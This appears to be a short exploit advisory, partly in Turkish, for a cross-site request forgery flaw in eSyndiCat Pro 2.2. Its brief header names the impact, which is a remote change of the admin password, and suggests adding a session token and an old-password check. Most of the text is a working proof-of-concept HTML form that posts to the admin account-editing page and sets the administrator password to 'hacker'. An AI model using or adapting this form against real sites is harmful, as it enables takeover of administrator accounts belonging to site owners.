< ------------------- header data start ------------------- >

#############################################################

# Application Name : eSyndiCat Pro 2.2

# Vulnerable Type : Xsrf

# Infection : Uzaktan otomatik olarak admin pass change edilebilir.

# Bug Fix Advice : Form’a Oturum Key’i (Session Token) eklenmeli, eski sifre sorulmalidir.

# author : Bug Researchers/system-hacker

############################################################

< ------------------- header data end of ------------------- >



< -- bug code start -- >

<form action=http://localhost/demo/admin/manage-admins.php?action=edit&id=2 method=post name=system>
<input type=hidden name=prevent_csrf value=adb803e494 /><table cellspacing=0 cellpadding=0 width=100% class=striped>
<input type=text name=username size=22 value=admin/>
<input type=text name=fullname size=22 value=Administrator/>
<input type=text name=email size=22 value=[email protected] />
<input type=password name=new_pass size=22 value=hacker />
<input type=password name=new_pass2 size=22 value=hacker/>
<td colspan=2><input type=submit name=save value=Save Changes />
<input type=hidden name=id value=2 />
<input type=hidden name=action value=edit />
</form>


< -- bug code end of -- >